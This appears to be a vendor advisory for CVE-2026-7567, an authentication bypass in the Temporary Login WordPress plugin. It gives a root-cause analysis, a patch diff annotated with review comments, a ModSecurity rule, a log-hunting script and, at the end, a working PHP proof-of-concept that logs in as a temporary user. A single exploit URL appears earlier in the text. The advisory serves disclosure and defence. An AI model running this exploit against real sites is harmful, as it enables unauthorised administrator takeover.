Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : May 4, 2026

CVE-2026-7567: Temporary Login <= 1.0.0 – Authentication Bypass to Account Takeover (temporary-login)

CVE ID: CVE-2026-7567
Severity: Critical (CVSS 9.8)
CWE: CWE-288 (Authentication Bypass Using an Alternate Path or Channel)
Vulnerable Version: 1.0.0
Patched Version: 1.1.0
Disclosed: April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-7567: This is an authentication bypass in the Temporary Login plugin for WordPress, affecting versions up to and including 1.0.0. The plugin does not check that the 'temp-login-token' GET parameter is a string before processing it in maybe_login_temporary_user(). Supplying the parameter as an array passes PHP's empty() check, and sanitize_key() returns an empty string for any non-scalar input; that empty string is then used as the meta value in the user lookup, which WordPress treats as no value constraint at all, so every active temporary user matches and the attacker is logged in as the first one without knowing any valid token. The CVSS score is 9.8 (Critical).

Root Cause: The vulnerability is in the maybe_login_temporary_user() function in temporary-login/core/admin.php at line 134. The function calls sanitize_key( $_GET['temp-login-token'] ) without first verifying that the parameter is a scalar string. When an attacker supplies 'temp-login-token' as an array (e.g. temp-login-token[]=value), the empty() check on line 133 does not reject the request, because an array with one element is not empty. sanitize_key() only processes scalar values (it guards with is_scalar()) and returns an empty string for an array. That empty string is passed as the $meta_value to get_users() in Options::get_user_by_token() (Options.php lines 60-62); WP_Meta_Query drops an empty meta_value clause and keeps only the meta_key condition, so the query returns every user carrying the '_temporary_login_token' meta key. get_user_by_token() does not require a non-empty token before querying.

Exploitation: An unauthenticated attacker can bypass authentication with a single crafted GET request to any WordPress URL on which the plugin's login hook runs. The attacker supplies 'temp-login-token' as an array parameter, for example: http://target.com/?temp-login-token[]=random. The plugin processes the malformed parameter, takes the first user returned by the lookup, and logs the attacker in as that user, provided the account has not expired (an expired first match is rejected by the existing is_user_expired() check and the request is redirected to the home page). No knowledge of a valid token is needed, and nothing in the request is specific to a site, so the same URL works against any vulnerable install that currently has at least one unexpired temporary user. The request can be sent to the home page, the login page or any other URL where WordPress runs the hook.

Patch Analysis: The patch in version 1.1.0 adds a second secret rather than fixing the input check. In admin.php (lines 133-138 of the patched file) the plugin reads a site token via Options::get_site_token() and, if one is stored, requires a 'tl-site' GET parameter strictly equal to it before the temporary user is accepted. The site token is not created on activation: create_site_token() is called from the temporary-user creation path in Options.php, and only when no token exists yet (patched lines 56-58), so an install upgraded with temporary users already present has no site token, and the new check is skipped, until another temporary user is created. The token is appended to every generated login URL as tl-site (Options.php lines 100-107) and is deleted only when all temporary users are removed (Options.php line 185). generate_token() now takes a length parameter, and the site token is 8 random bytes (16 hex characters) rather than the 32 bytes used for user tokens. The array-parameter bypass itself is left in place: sanitize_key() still receives the raw $_GET value and get_user_by_token() is still called with an empty token; the request is only rejected afterwards because the attacker cannot supply a valid tl-site. Because that value is site-wide and embedded in every issued login link, anyone who has received a temporary login URL for the site, even an expired one, still holds the second factor.
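To make the Root Cause and Patch Analysis concrete, here is an added, self-contained PHP script (not the plugin's code and not from Atomic Edge) that reproduces the chain in isolation: sanitize_key() is copied from WordPress core minus its filter hook, while the user table, the token values, the query strings, the meta-value lookup and the two handler flows are constructed stand-ins for Options::get_user_by_token(), WP_Meta_Query and maybe_login_temporary_user(). The hardened flow shows the input check the 1.1.0 patch leaves out: require a string, refuse an empty token before querying, and refuse an ambiguous result.

```php
<?php
// Added example, not code from the Temporary Login plugin or from Atomic Edge:
// reproduces the CVE-2026-7567 root cause in isolation. sanitize_key() is a copy of
// the WordPress core function without its filter hook; everything else is a stand-in.

declare(strict_types=1);

// WordPress core sanitize_key(): a non-scalar argument (an array) yields '' rather than an error.
function sanitize_key($key): string
{
    $sanitized = '';
    if (is_scalar($key)) {
        $sanitized = strtolower((string) $key);
        $sanitized = preg_replace('/[^a-z0-9_\-]/', '', $sanitized);
    }
    return $sanitized;
}

// Constructed user table: user ID => _temporary_login_token meta value (not real tokens).
const TEMP_USERS = [
    7  => 'd2d7e4f1a9c0b3e8',
    12 => '0f3b8c1a77e2d9c4',
];

// Stand-in for get_users(['meta_key' => '_temporary_login_token', 'meta_value' => $token])
// as WP_Meta_Query treats it: an empty meta_value clause is dropped, only the key is
// matched, and every user that has the meta key comes back.
function query_users_by_token_meta(string $token): array
{
    $matches = [];
    foreach (TEMP_USERS as $id => $stored) {
        if ($token === '' || $stored === $token) {
            $matches[] = $id;
        }
    }
    return $matches;
}

// Vulnerable flow, mirroring admin.php lines 133-134: empty(), sanitize_key(), lookup.
function vulnerable_lookup(array $get): ?int
{
    if (empty($get['temp-login-token'])) {
        return null;                                  // an array with one element is not "empty"
    }
    $token = sanitize_key($get['temp-login-token']);  // '' when the value is an array
    $users = query_users_by_token_meta($token);
    return $users[0] ?? null;                         // first matching user gets logged in
}

// Hardened flow: require a scalar string, reject an empty token before querying,
// and refuse a result that is not exactly one user.
function hardened_lookup(array $get): ?int
{
    $raw = $get['temp-login-token'] ?? null;
    if (!is_string($raw)) {
        return null;
    }
    $token = sanitize_key($raw);
    if ($token === '') {
        return null;
    }
    $users = query_users_by_token_meta($token);
    return count($users) === 1 ? $users[0] : null;
}

// Drive both flows with query strings parsed the way PHP populates $_GET (constructed inputs).
$queries = [
    'temp-login-token=d2d7e4f1a9c0b3e8',  // genuine token for user 7
    'temp-login-token[]=anything',        // the CVE-2026-7567 array form
    'temp-login-token=bogus',             // wrong scalar token
];
foreach ($queries as $qs) {
    parse_str($qs, $get);
    printf(
        "%-34s vulnerable=%-4s hardened=%s\n",
        $qs,
        var_export(vulnerable_lookup($get), true),
        var_export(hardened_lookup($get), true)
    );
}
```

Run it with the php CLI. parse_str() builds the array exactly as PHP builds $_GET, so the second query string reaches the vulnerable flow as an array, passes empty(), becomes '' inside sanitize_key(), and resolves to the first user (ID 7), while the hardened flow returns null for it and still resolves the genuine token to user 7; the wrong scalar token is rejected by both.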

Impact: Successful exploitation gives an unauthenticated attacker an authenticated session as an active temporary user. Such accounts are typically created with elevated roles, often administrator, so the attacker can do whatever the compromised account can: read sensitive data, modify content, install plugins or create new administrative users, turning the bypass into a full site takeover. No prior authentication is required and the request is identical for every vulnerable site. The CVSS 9.8 score reflects network-based access, low attack complexity and no required privileges or user interaction.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/temporary-login/assets/admin.asset.php
+++ b/temporary-login/assets/admin.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'wp-components', 'wp-dom-ready', 'wp-element', 'wp-i18n'), 'version' => 'f1225bbc738e8f4d25d5');
+<?php return array('dependencies' => array('react', 'wp-components', 'wp-dom-ready', 'wp-element', 'wp-i18n'), 'version' => 'f6a02a7bcb72cda9f414');
--- a/temporary-login/core/admin.php
+++ b/temporary-login/core/admin.php
@@ -131,9 +131,16 @@

 		$token = sanitize_key( $_GET['temp-login-token'] );

+		$is_site_token_validated = true;
+
+		$site_token = Options::get_site_token();
+		if ( ! empty( $site_token ) ) {
+			$is_site_token_validated = ! empty( $_GET['tl-site'] ) && $site_token === $_GET['tl-site'];
+		}
+
 		$user = Options::get_user_by_token( $token );

-		if ( ! $user || Options::is_user_expired( $user->ID ) ) {
+		if ( ! $user || ! $is_site_token_validated || Options::is_user_expired( $user->ID ) ) {
 			wp_safe_redirect( home_url() );
 			die;
 		}
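Review bot: the input bug is still live in this hunk: the `$token = sanitize_key( $_GET['temp-login-token'] );` context line above still accepts an array, and `Options::get_user_by_token( $token )` still runs the empty-token query before `$is_site_token_validated` is consulted, so the site token is a second secret layered over the fault rather than a fix. Bail out before the lookup, e.g. `if ( ! isset( $_GET['temp-login-token'] ) || ! is_string( $_GET['temp-login-token'] ) ) { return; }` and `if ( '' === $token ) { return; }`, and compare the site token with `is_string( $_GET['tl-site'] ) && hash_equals( $site_token, $_GET['tl-site'] )` rather than `===` so the check is constant-time. Note also that when `get_site_token()` returns empty, the default `$is_site_token_validated = true` leaves the 1.0.0 behaviour unchanged.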
--- a/temporary-login/core/options.php
+++ b/temporary-login/core/options.php
@@ -53,6 +53,10 @@
 			update_user_meta( $user_id, $meta_key, $meta_value );
 		}

+		if ( ! static::get_site_token() ) {
+			static::create_site_token();
+		}
+
 		return $user_id;
 	}

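Review bot: the site token is created lazily here, inside the user-creation path and only when none exists, so an install that upgrades to 1.1.0 with temporary users already present has no `_temporary_login_site_token` option until the next temporary user is created; combined with the `if ( ! empty( $site_token ) )` guard in admin.php, those existing users stay reachable through the array bypass after the upgrade. Create the token on activation or on version upgrade (or treat a missing token as failed validation) instead of deferring it to the next `create` call.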
@@ -60,8 +64,22 @@
 		return current_time( 'timestamp' ) + WEEK_IN_SECONDS;
 	}

-	private static function generate_token(): string {
-		return bin2hex( random_bytes( 32 ) );
+	private static function generate_token( $length = 32 ): string {
+		return bin2hex( random_bytes( $length ) );
+	}
+
+	public static function get_site_token() {
+		return get_option( '_temporary_login_site_token' );
+	}
+
+	private static function create_site_token(): void {
+		$site_token = static::generate_token( 8 );
+
+		update_option( '_temporary_login_site_token', $site_token );
+	}
+
+	private static function delete_site_token(): void {
+		delete_option( '_temporary_login_site_token' );
 	}

 	public static function is_temporary_user( $user_ID ) : bool {
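Review bot: `generate_token( $length = 32 )` drops the parameter type; declare it `int $length = 32` so nothing but an integer reaches `random_bytes()`. The 8-byte site token (16 hex characters) is also far shorter than the 32-byte user token for no reason stated in the change; there is no cost to keeping 32. `get_site_token()` returns `false` when the option is absent, so either give it a `: string` return type with a `(string)` cast or document that callers must treat `false` as "no token".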
@@ -75,9 +93,18 @@
 			return '';
 		}

-		return add_query_arg( [
+		$login_url = add_query_arg( [
 			'temp-login-token' => $token,
 		], admin_url() );
+
+		$site_token = static::get_site_token();
+		if ( ! empty( $site_token ) ) {
+			$login_url = add_query_arg( [
+				'tl-site' => $site_token,
+			], $login_url );
+		}
+
+		return $login_url;
 	}

 	public static function get_expiration_human( $user_ID ): string {
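Review bot: `tl-site` is a single site-wide value appended to every temporary login URL, so every recipient of a login link, including links that have since expired, holds the second factor that admin.php now relies on; this should be called out in a comment here, and the value should not be treated as a substitute for validating `temp-login-token` as a string. If the URL is to carry a second value, derive it per user (for example an HMAC of the user token under the site secret) so one issued link does not vouch for another user's session.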
@@ -154,6 +181,8 @@
 		foreach ( $temporary_users as $user ) {
 			wp_delete_user( $user->ID );
 		}
+
+		static::delete_site_token();
 	}

 	public static function remove_expired_temporary_users() {
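Review bot: `delete_site_token()` runs only in this remove-all path, so the shared `tl-site` value outlives the individual users it was issued with; `remove_expired_temporary_users()` directly below and any single-user deletion should rotate it too, or the option should be regenerated whenever the set of temporary users changes, otherwise a link that expired months ago still carries a valid site token.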
--- a/temporary-login/temporary-login.php
+++ b/temporary-login/temporary-login.php
@@ -4,7 +4,8 @@
  * Description: Create simple, no password user access with a single click.
  * Plugin URI: https://elementor.com/
  * Author: Elementor.com
- * Version: 1.0.0
+ * Author URI: https://elementor.com/?utm_source=wp-plugins&utm_campaign=temp-login&utm_medium=wp-dash
+ * Version: 1.1.0
  * License: GPL-3
  * License URI: https://www.gnu.org/licenses/gpl-3.0.en.html
  *
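Review bot: the new `Author URI` carries utm_source, utm_campaign and utm_medium tracking parameters in a plugin header that WordPress renders as a link on the Plugins screen; the convention is a plain URL, which would also keep this hunk to the version bump it is meant to carry.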
@@ -15,7 +16,7 @@
 	exit; // Exit if accessed directly.
 }

-define( 'TEMPORARY_LOGIN_VERSION', '1.0.0' );
+define( 'TEMPORARY_LOGIN_VERSION', '1.1.0' );

 define( 'TEMPORARY_LOGIN__FILE__', __FILE__ );
 define( 'TEMPORARY_LOGIN_PLUGIN_BASE', plugin_basename( TEMPORARY_LOGIN__FILE__ ) );

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-7567
# Blocks the array form of the temp-login-token GET parameter (temp-login-token[]=...,
# temp-login-token[0]=... and their %5B/%5D-encoded variants). The plugin's login hook
# runs on every WordPress URL, so the rule is not scoped to a path; scoping on
# REQUEST_URI would also fail, because that variable includes the query string.
# A legitimate login link carries temp-login-token as a plain scalar and is not matched.
SecRule ARGS_GET_NAMES "@rx ^temp-login-token\[" \
  "id:20267567,phase:2,t:none,deny,status:403,log,msg:'CVE-2026-7567 Temporary Login Authentication Bypass via array parameter',severity:'CRITICAL',tag:'CVE-2026-7567'"
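For teams checking whether the bypass was attempted before the WAF rule was in place, the following is an added PHP example (not Atomic Edge's tooling and not part of the plugin) that hunts access logs for the indicator: the temp-login-token parameter name followed by an opening bracket, raw or percent-encoded. It goes slightly beyond the PoC URL by also catching temp-login-token[0]= and %5B-encoded variants. The log lines are constructed samples in the combined log format, and the line regex assumes that format; adjust it for other log layouts.

```php
<?php
// Added example, not code from the Temporary Login plugin or from Atomic Edge:
// retroactive hunt for CVE-2026-7567 exploitation attempts in web-server access logs.
// The log lines at the bottom are constructed samples in the combined log format.

declare(strict_types=1);

// True when the request path carries temp-login-token in array form:
// temp-login-token[]=..., temp-login-token[0]=..., or their %5B/%5D-encoded equivalents.
function is_array_form_token_request(string $request_path): bool
{
    $pos = strpos($request_path, '?');
    if ($pos === false) {
        return false;
    }
    $query = substr($request_path, $pos + 1);
    foreach (explode('&', $query) as $pair) {
        // Decode the parameter name once, as PHP does when it builds $_GET, then
        // require the bracket right after the name so a scalar token is not flagged.
        $name = rawurldecode(explode('=', $pair, 2)[0]);
        if (preg_match('/^temp-login-token\[/', $name) === 1) {
            return true;
        }
    }
    return false;
}

// Parse one combined-format line into the fields we need; null if it does not match.
function parse_access_log_line(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) /';
    if (preg_match($re, $line, $m) !== 1) {
        return null;
    }
    return [
        'ip'     => $m[1],
        'time'   => $m[2],
        'method' => $m[3],
        'path'   => $m[4],
        'status' => (int) $m[5],
    ];
}

// Return the parsed entries whose request used the array form of the parameter.
function hunt_cve_2026_7567(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        $entry = parse_access_log_line($line);
        if ($entry !== null && is_array_form_token_request($entry['path'])) {
            $hits[] = $entry;
        }
    }
    return $hits;
}

// Constructed sample traffic (not real log data): two bypass attempts from different
// clients, one legitimate scalar-token login, and a follow-up dashboard fetch.
$sample_log = [
    '203.0.113.5 - - [29/Apr/2026:10:01:02 +0000] "GET /?temp-login-token[]=x HTTP/1.1" 302 0 "-" "curl/8.4.0"',
    '203.0.113.5 - - [29/Apr/2026:10:01:03 +0000] "GET /wp-admin/ HTTP/1.1" 200 51233 "-" "curl/8.4.0"',
    '198.51.100.7 - - [29/Apr/2026:10:05:00 +0000] "GET /wp-admin/?temp-login-token=0f3b8c1a77e2d9c4 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [29/Apr/2026:10:07:11 +0000] "GET /index.php?temp-login-token%5B0%5D=y HTTP/1.1" 302 0 "-" "python-requests/2.31"',
];

foreach (hunt_cve_2026_7567($sample_log) as $hit) {
    printf("%s %s %s %s -> %d\n", $hit['time'], $hit['ip'], $hit['method'], $hit['path'], $hit['status']);
}
```

Only the first and fourth sample lines are reported; the scalar-token login from 198.51.100.7 is not. A bypass attempt and a failed one both show up as a 302, since the plugin redirects to admin_url() on success and to home_url() on failure, so correlate each hit with the same client's subsequent /wp-admin/ requests returning 200 (as the second sample line does) before treating it as a successful takeover.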

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-7567 - Temporary Login <= 1.0.0 Authentication Bypass to Account Takeover

$target_url = 'http://example.com'; // Change this to the target WordPress URL (no trailing slash)
$cookie_jar = tempnam(sys_get_temp_dir(), 'tl_poc_'); // Cookie store for the authenticated session

// Step 1: Send a request with temp-login-token as an array. empty() passes because the
// array has one element, sanitize_key() returns '' for a non-scalar value, and
// get_user_by_token('') matches every user carrying the _temporary_login_token meta key.
$exploit_url = $target_url . '/?temp-login-token[]=anything';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); // Follow the plugin's redirect to see where we end up
curl_setopt($ch, CURLOPT_HEADER, true); // Include response headers
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_jar); // Enables the cookie engine, so auth cookies set during the redirect chain are kept and written out on close

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$final_url = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL);
curl_close($ch);

// Step 2: A successful login ends on admin_url(); a failure is redirected to home_url().
// Landing on wp-login.php?redirect_to=...wp-admin... means the redirect happened but no
// auth cookie was set, so exclude it instead of matching the 'wp-admin' substring alone.
$landed_in_admin = strpos($final_url, '/wp-admin') !== false
    && strpos($final_url, 'wp-login.php') === false;

if ($landed_in_admin) {
    echo "[+] Authentication bypass successful! Logged in as a temporary user.\n";
    echo "[+] Final URL: $final_url\n";

    // Step 3: Confirm the session by fetching the dashboard with the stored cookies
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_jar);
    $dashboard = curl_exec($ch);
    $dash_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    // An unauthenticated /wp-admin/ request answers 302 to wp-login.php with an empty body
    if ($dash_code === 200 && strpos($dashboard, 'Dashboard') !== false) {
        echo "[+] Successfully accessed WordPress dashboard.\n";
    }
} else {
    echo "[-] Exploit failed (HTTP $http_code, final URL $final_url). Target may be patched or no unexpired temporary users exist.\n";
}

// Clean up
if (is_file($cookie_jar)) {
    unlink($cookie_jar);
}
